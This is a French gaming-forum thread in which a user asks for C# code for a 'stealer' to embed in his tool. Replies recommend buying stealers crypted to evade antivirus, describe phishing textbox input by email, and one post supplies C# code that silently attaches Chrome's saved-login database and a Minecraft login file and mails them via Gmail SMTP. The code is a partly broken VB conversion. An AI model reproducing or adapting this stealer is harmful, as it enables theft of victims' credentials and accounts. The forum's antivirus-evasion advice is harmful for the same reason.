• Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr - RealityGaming

Résolu Cherche codage C#

Statut
N'est pas ouverte pour d'autres réponses.

iB3

Patrol GR Y60, Audi TT MK1 225
Premium
Inscrit
4 Février 2013
J'aime
2 820
Reply from iB3 Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #1
Salut à tous je cherche le codage

ProgressBar et un Stealer Pour avoir le texte marquer dans le texbox

Merci Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - ;) - RealityGaming

K

Keyper

Invité
Reply from Keyper Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #2
Pour un stealer te fait pas chier si tu débutes prend C24 ou HC que tu crypt FUD 100% et c bon

iB3

Patrol GR Y60, Audi TT MK1 225
Premium
Inscrit
4 Février 2013
J'aime
2 820
Reply from iB3 Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #3
J'aimerai le mettre dans mon tool donc il le faut pas en codage le bordel ?

K

Keyper

Invité
Reply from Keyper Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #4
J'aimerai le mettre dans mon tool donc il le faut pas en codage le bordel ?
Ah mdr dans ton tool autant pour moi je pensais que tu voulais faire le tien mdr ba bon courage j'ai la mémoire courte je m'en rapelle plus dsl

0xff

Ancien staff
Ancien staff
Inscrit
3 Janvier 2013
J'aime
6 314
Reply from 0xff Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #5
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :rofl: - RealityGaming c'est tout con, au moment du clique ta progressBar se déclanche, a la fin de la progressBar un mail est envoyé via SMTP de Gmail ou autre messagerie avec intitulé du mail
- ID ou autre (contenue dans la TextBox Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - ;) - RealityGaming)

Inscrit
18 Octobre 2013
J'aime
6
Reply from xSheldown Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #6
Tiens :
Code:
using System.Net.Mail;
using System.Net.Sockets;
using System.Net;
using System.Text.RegularExpressions;
using System.Text;
using System.Management;

public class Form1
{
    private void  // ERROR: Handles clauses are not supported in C#
Form1_Load(System.Object sender, System.EventArgs e)
    {
        string myhost = System.Net.Dns.GetHostName();
        string myip = System.Net.Dns.GetHostAddresses(myhost).GetValue(2).ToString;
        MailMessage MyMailMessage = new MailMessage();
        try {
            MyMailMessage.From = new MailAddress("EMAIL ADDRESS GOES HERE");
            MyMailMessage.To.Add("EMAIL ADDRESS GOES HERE");
            MyMailMessage.Subject = ("Data Sender");
            MyMailMessage.Body = ("Local IP: " + myip + Constants.vbNewLine + "Machine Name: " + myhost + Constants.vbNewLine + "OS Name: " + My.Computer.Info.OSFullName + Constants.vbNewLine + "OS Version: " + My.Computer.Info.OSVersion + Constants.vbNewLine + "OS Platform: " + My.Computer.Info.OSPlatform + Constants.vbNewLine + "Username: " + System.Environment.UserName + Constants.vbNewLine + "Sender: " + System.Environment.CommandLine + Constants.vbNewLine + "System Directory: " + System.Environment.SystemDirectory + Constants.vbNewLine + "Username: " + System.Environment.UserName + Constants.vbNewLine + "PC Time: " + My.Computer.Clock.LocalTime + Constants.vbNewLine + "Availible Memory: " + My.Computer.Info.AvailablePhysicalMemory.ToString);
            object mc = new Attachment("C:\\Users\\" + System.Environment.UserName + "\\AppData\\Roaming\\.minecraft\\lastlogin");
            object chrome = new Attachment("C:\\Users\\" + System.Environment.UserName + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
            MyMailMessage.Attachments.Add(mc);
            MyMailMessage.Attachments.Add(chrome);
            SmtpClient SMTP = new SmtpClient("smtp.gmail.com");
            SMTP.Port = 587;
            SMTP.EnableSsl = true;
            SMTP.Credentials = new System.Net.NetworkCredential("EMAIL ADDRESS GOES HERE", "EMAIL PASSWORD GOES HERE");
            SMTP.Send(MyMailMessage);
            Application.Exit();
        } catch (Exception ex) {
        }

}
}

Hersoft

Jul
Premium
Inscrit
6 Novembre 2012
J'aime
981
Reply from Hersoft Forums généraux Informatique Programmation Questions, aides et recherches générales Résolu : Cherche codage C# #7
clique :
Vous devez vous inscrire pour voir les liens !

clique :
Vous devez vous inscrire pour voir les liens !

Statut
N'est pas ouverte pour d'autres réponses.